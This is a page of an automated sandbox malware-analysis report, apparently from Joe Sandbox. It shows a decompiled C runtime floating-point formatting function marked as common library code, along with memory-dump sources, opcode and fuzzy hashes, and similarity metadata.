                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                                                                                                                                                                                                                                    0x004134e0
                                                                                                                                                                                                                                    0x004134e6
                                                                                                                                                                                                                                    0x00413559
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                                                    0x004134ed
                                                                                                                                                                                                                                    0x004134f0
                                                                                                                                                                                                                                    0x0041350b
                                                                                                                                                                                                                                    0x0041350e
                                                                                                                                                                                                                                    0x0041352e
                                                                                                                                                                                                                                    0x00413540
                                                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                                                    0x00413510
                                                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00413515
                                                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                                                    0x00413527
                                                                                                                                                                                                                                    0x00413513
                                                                                                                                                                                                                                    0x0041355e
                                                                                                                                                                                                                                    0x00413562
                                                                                                                                                                                                                                    0x004134f2
                                                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                                                    0x0041350a
                                                                                                                                                                                                                                    0x004134f0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                    • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02C03742 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3016257755-0
                                                                                                                                                                                                                                    • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                    • Instruction ID: 949df42e1c195bce24a16d1e7e7eeae065619bf253fc116ad9da7e6616097013
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0117E7200018ABBCF125F89CD85CEE3F63BB49354B498495FA285A070D336DAB1AB81
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%